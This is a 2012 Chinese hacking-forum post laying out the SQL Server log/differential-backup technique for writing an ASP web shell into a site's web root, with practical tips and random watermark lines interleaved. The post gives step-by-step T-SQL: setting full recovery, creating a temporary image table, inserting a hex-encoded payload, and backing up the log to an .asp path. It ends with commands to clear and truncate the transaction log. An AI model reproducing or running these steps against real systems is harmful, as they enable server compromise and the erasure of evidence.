中国网络渗透测试联盟
标题:
差异备份提权
[打印本页]
作者:
admin
时间:
2012-9-15 14:38
标题:
差异备份提权
select * from master.dbo.sysdatabases 列出所有列的记录
; ?% X5 ?% E5 p% ]7 e* U( I4 |
6 m' V3 _4 N7 n0 i% h) L
select name from master.dbo.sysdatabases 仅列出name列的记录
+ w- \* ?6 D7 `% T/ w
: x- ?9 z# J! X. M
注意:可以利用log和数据库备份两上都行,log备份不成功用数据库备份
3 \5 j6 A5 I" P8 T9 Z O
: z- e# z' p) N' L* s
alter database 数据库名 set RECOVERY FULL--
; U; B0 p, A" f2 p
* c% Q F$ h0 k h( ? ?! F
create table cmd (a image)-- \**cmd是创建的临时表
6 K% h5 [0 d {* m6 ^+ {( N
! e+ v' A4 X$ I
backup log 数据库名 to disk = 'f:\wwwroot\1.asp' with init--
" r1 v* m5 q- E0 W% l3 k4 p9 R
7 F) B! D% ~! `
insert into cmd(a) values (0x130a0d0a663A5CCDF8D5BE5CCDF8CDA8C6F3D2B5425C626C75656B6973735C7765625C312E6173700d0a)--
% M" L7 i; J! [/ X) v
2 x/ v& A2 e% A# w
//木马存放路径(转换16进制0x130a0d0a替换原来0x最后添加0d0a要多加几个)
3 D! [. h6 ]. X
$ V; D. X2 }( n/ C6 o* M
backup log 数据库名 to disk = 'f:\wwwroot\1.asp'-- (要备份的目录)
+ h3 M, e2 M, D, r# I
h9 n# A) P, `! x8 K$ n' x
drop table cmd--
# w6 H+ v( M! l
9 ~6 P+ |8 G1 ?0 r9 c7 G+ U! T
0 ?+ B! k0 U2 O9 c( I( O) H
f:\
, Z$ A0 e. `7 @' y. E F
16进制转换(0x130a0d0a663A5CCDF8D5BE5CCDF8CDA8C6F3D2B5425C626C75656B6973735C7765625C312E6173700d0a)
$ X9 m" B* |4 n. Q; x* w# p
( Y$ R6 l- x; r1 Y" e
最好多加几个回车0d0a,要不会出错哈
9 h! k. c M: s( e
/ k4 g+ l) j8 q) E2 S+ y* A' V1 B
, O/ t! q9 n' q. K3 K- C
SQL Server日志清空方法
1 G+ R, y4 ^8 x5 G, F% ~
" s. V$ J' ^6 E! H+ V5 }5 _' e$ R- r/ e( v
在查询分析器中顺序执行以下三步,其中 databasename 为你的数据库文件名
5 ]# C! u, X& ~' c
1.清空日志:DUMP TRANSACTION databasename WITH NO_LOG
& ?' ~6 c3 S8 H! \( x. |
) w4 K- S1 @0 ? W, y
2.截断事务日志:BACKUP LOG databasename WITH NO_LOG
: r) r" U( s$ j0 E3 V5 U; r2 ]; i
. R4 `1 P4 U5 Q o( |4 k
3.收缩数据库:DBCC SHRINKDATABASE(databasename)
. `, \0 j2 c& n! ]4 n _
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2